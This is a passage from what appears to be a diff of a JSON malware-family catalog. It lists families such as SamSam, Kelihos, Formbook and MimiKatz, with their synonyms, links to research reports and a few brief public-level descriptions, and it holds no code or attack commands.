"1d451231-8b27-4250-b3db-55c5c8ea99cb", - "value": "xxmm", - "description": "", - "meta": { - "synonyms": [ - "ShadowWalker" - ], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" - ] - } - }, - { - "uuid": "805b99d1-233d-4f7f-b343-440e5d507494", - "value": "Rambo", - "description": "", - "meta": { - "synonyms": [ - "brebsd" - ], - "type": [], - "refs": [ - "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor" - ] - } - }, - { - "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", - "value": "Arefty", - "description": "", - "meta": { - "synonyms": [], - 
"type": [], - "refs": [ - "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" - ] - } - }, - { - "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", - "value": "FireCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" - ] - } - }, - { - "uuid": "f9b3757e-99c7-4999-8b79-87609407f895", - "value": "Kuluoz", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", - "value": "LockPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", - "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", - "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" - ] - } - }, - { - "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b", - "value": "Unidentified 028", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", - "value": "Tsunami", - "description": "", - "meta": { - "synonyms": [ - "Radiation", - "Amnesia" - ], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", - "http://get.cyberx-labs.com/radiation-report", - "https://www.8ackprotect.com/blog/big_brother_is_attacking_you" - ] - } - }, - { - "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", - "value": "Nymaim2", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/" - ] - } - }, - { - "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", - "value": "Nanocore RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/" - ] - } - }, - { - "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", - "value": "homefry", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - } - }, - { - "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", - "value": "Coldroot RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x2A.html" - ] - } - }, - { - "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", - "value": "iSpy Keylogger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.zscaler.com/blogs/research/ispy-keylogger" - ] - } - }, - { - "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", - "value": "Mewsei", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", - "value": "ATMSpitter", - "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", - "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" - ] - } - }, - { - "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", - "value": "Patcher", - "description": "", - "meta": { - "synonyms": [ - "Findzip" - ], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" - ] - } - }, - { - "uuid": 
"64d40102-c296-4a85-9b9c-b3afb6d58e09", - "value": "Cueisfry", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" - ] - } - }, - { - "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", - "value": "Unidentified 051", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/CDA/status/1014144988454772736" - ] - } - }, - { - "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", - "value": "Bundestrojaner", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", - "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf" - ] - } - }, - { - "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", - "value": "GreenShaitan", - "description": "", - "meta": { - "synonyms": [ - "eoehttp" - ], - "type": [], - "refs": [ - "https://blog.cylance.com/spear-a-threat-actor-resurfaces" - ] - } - }, - { - "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", - "value": "Misfox", - "description": "", - "meta": { - "synonyms": [ - "ModPack", - "MixFox" - ], - "type": [], - "refs": [] - } - }, - { - "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", - "value": "H1N1 Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" - ] - } - }, - { - "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", - "value": "Client Maximus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" - ] - } - }, - { - "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3", - "value": "ZooPark", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf", - "https://securelist.com/whos-who-in-the-zoo/85394" - ] - } - }, - { - "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", - "value": "SamSam", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", - "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/", - "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", - "http://blog.talosintel.com/2016/03/samsam-ransomware.html", - "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html" - ] - } - }, - { - "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", - "value": "Kelihos", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", - "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", - "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", - "https://en.wikipedia.org/wiki/Kelihos_botnet" - ] - } - }, - { - "uuid": "826c31ca-2617-47e4-b236-205da3881182", - "value": "Reaver", - "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. 
The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" - ] - } - }, - { - "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", - "value": "owaauth", - "description": "", - "meta": { - "synonyms": [ - "luckyowa" - ], - "type": [], - "refs": [ - "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" - ] - } - }, - { - "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e", - "value": "Trochilus RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/5loyd/trochilus/", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" - ] - } - }, - { - "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", - "value": "AthenaGo RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintel.com/2017/02/athena-go.html" - ] - } - }, - { - "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", - "value": "SquirtDanger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" - ] - } - }, - { - "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260", - "value": "Unidentified 035", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", - "value": "Volgmer", - 
"description": "", - "meta": { - "synonyms": [ - "FALLCHILL", - "Manuscrypt" - ], - "type": [], - "refs": [ - "https://www.us-cert.gov/ncas/alerts/TA17-318B" - ] - } - }, - { - "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", - "value": "MBRlock", - "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.", - "meta": { - "synonyms": [ - "DexLocker" - ], - "type": [], - "refs": [ - "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html", - "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", - "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", - "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d" - ] - } - }, - { - "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", - "value": "Erebus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" - ] - } - }, - { - "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", - "value": "Sword", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", - "value": "BlackEnergy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", - "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", - "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/" - ] - } - }, - { - "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", - "value": "AdWind", - "description": "", - "meta": { - "synonyms": [ - "JBifrost", - "JSocket", - 
"AlienSpy", - "UNRECOM", - "Frutas" - ], - "type": [], - "refs": [ - "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", - "http://malware-traffic-analysis.net/2017/07/04/index.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", - "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", - "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html" - ] - } - }, - { - "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", - "value": "HideDRV", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" - ] - } - }, - { - "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", - "value": "Formbook", - "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. 
It was initially called \"Babushka Crypter\" by Insidemalware.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", - "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", - "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", - "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", - "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", - "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", - "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" - ] - } - }, - { - "uuid": "a37c826a-bb30-49fb-952a-63b1cab366c3", - "value": "MPK", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] - } - }, - { - "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", - "value": "9002 RAT", - "description": "", - "meta": { - "synonyms": [ - "McRAT", - "Hydraq" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", - "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315", - "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", - 
"https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", - "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", - "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures" - ] - } - }, - { - "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", - "value": "PetrWrap", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" - ] - } - }, - { - "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", - "value": "Buterat", - "description": "", - "meta": { - "synonyms": [ - "spyvoltar" - ], - "type": [], - "refs": [ - "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" - ] - } - }, - { - "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", - "value": "EvilPony", - "description": "Privately modded version of the Pony stealer.", - "meta": { - "synonyms": [ - "CREstealer" - ], - "type": [], - "refs": [ - "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/", - "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", - "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/" - ] - } - }, - { - "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", - "value": "KeRanger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html", - "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html", - "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/" - ] - } - }, - { - "uuid": 
"41acd50d-e602-41a9-85e7-c091fb4bc126", - "value": "Troldesh", - "description": "", - "meta": { - "synonyms": [ - "Shade" - ], - "type": [], - "refs": [ - "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", - "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/" - ] - } - }, - { - "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047", - "value": "KHRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/", - "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor" - ] - } - }, - { - "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", - "value": "Mocton", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", - "value": "Stantinko", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" - ] - } - }, - { - "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", - "value": "Ransoc", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles" - ] - } - }, - { - "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51", - "value": "NexusLogger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/", - "https://twitter.com/PhysicalDrive0/status/842853292124360706" - ] - } - }, - { - "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", - "value": "Decebal", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", - "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", - "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" - ] - } - }, - { - "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", - "value": "TinyLoader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0" - ] - } - }, - { - "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", - "value": "Cobra Carbon System", - "description": "", - "meta": { - "synonyms": [ - "Carbon" - ], - "type": [], - "refs": [ - "https://github.com/hfiref0x/TDL", - "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", - "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", - "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", - "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/" - ] - } - }, - { - "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", - "value": "HiddenLotus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" - ] - } - }, - { - "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", - "value": "Umbreon", - "description": "", - "meta": { - "synonyms": [ - "Espeon" - ], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", - "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" - ] - } - }, - { - "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", - "value": "Batel", - "description": "", - "meta": { - "synonyms": [], 
- "type": [], - "refs": [] - } - }, - { - "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", - "value": "Locky Loader", - "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15", - "value": "ZXShell", - "description": "", - "meta": { - "synonyms": [ - "Sensocode" - ], - "type": [], - "refs": [ - "https://github.com/smb01/zxshell", - "https://blogs.cisco.com/security/talos/opening-zxshell", - "https://blogs.rsa.com/cat-phishing/" - ] - } - }, - { - "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", - "value": "MacVX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html" - ] - } - }, - { - "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", - "value": "sykipot", - "description": "", - "meta": { - "synonyms": [ - "getkys" - ], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", - "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", - "https://community.rsa.com/thread/185437", - "https://www.symantec.com/connect/blogs/sykipot-attacks" - ] - } - }, - { - "uuid": "0777cb30-534f-44bb-a7af-906a422bd624", - "value": "StealthAgent", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" - ] - } - }, - { - "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0", - "value": "Upatre", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", - "https://secrary.com/ReversingMalware/Upatre/" - ] - } - }, - { - "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", - "value": "Hamweq", - "description": "", - "meta": { - "synonyms": [], - "type": [], 
- "refs": [ - "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" - ] - } - }, - { - "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", - "value": "NetSupportManager RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.netsupportmanager.com/index.asp", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", - "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" - ] - } - }, - { - "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631", - "value": "Jolob", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html" - ] - } - }, - { - "uuid": "cfed10ed-6601-469e-a1df-2d561b031244", - "value": "WebC2-GreenCat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", - "value": "Karius", - "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://research.checkpoint.com/banking-trojans-development/", - "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/" - ] - } - }, - { - "uuid": 
"d258de39-e351-47e3-b619-731c87f13d9c", - "value": "Alreay", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" - ] - } - }, - { - "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", - "value": "Stresspaint", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", - "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/", - "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", - "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/" - ] - } - }, - { - "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", - "value": "Scote", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" - ] - } - }, - { - "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", - "value": "Equationgroup (Sorting)", - "description": "Rough collection EQGRP samples, to be sorted", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://laanwj.github.io/2016/08/28/feintcloud.html", - "https://laanwj.github.io/2016/09/17/seconddate-cnc.html", - "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html", - "https://laanwj.github.io/2016/08/22/blatsting.html", - "https://laanwj.github.io/2016/09/11/buzzdirection.html", - "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", - "https://laanwj.github.io/2016/09/13/blatsting-rsa.html", - "https://laanwj.github.io/2016/09/01/tadaqueos.html", - "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html" - ] - } - }, - { - "uuid": 
"2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", - "value": "CrypMic", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", - "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" - ] - } - }, - { - "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c", - "value": "Rokku", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4", - "value": "Zeus Sphinx", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/uk-banks-hit-with-new-zeus-sphinx-variant-and-renewed-kronos-banking-trojan-attacks/", - "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/", - "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/" - ] - } - }, - { - "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", - "value": "Locky (Decryptor)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", - "value": "MimiKatz", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/gentilkiwi/mimikatz", - "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", - "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", - " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" - ] - } - }, - { - "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", - "value": "win.gandcrab", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", - 
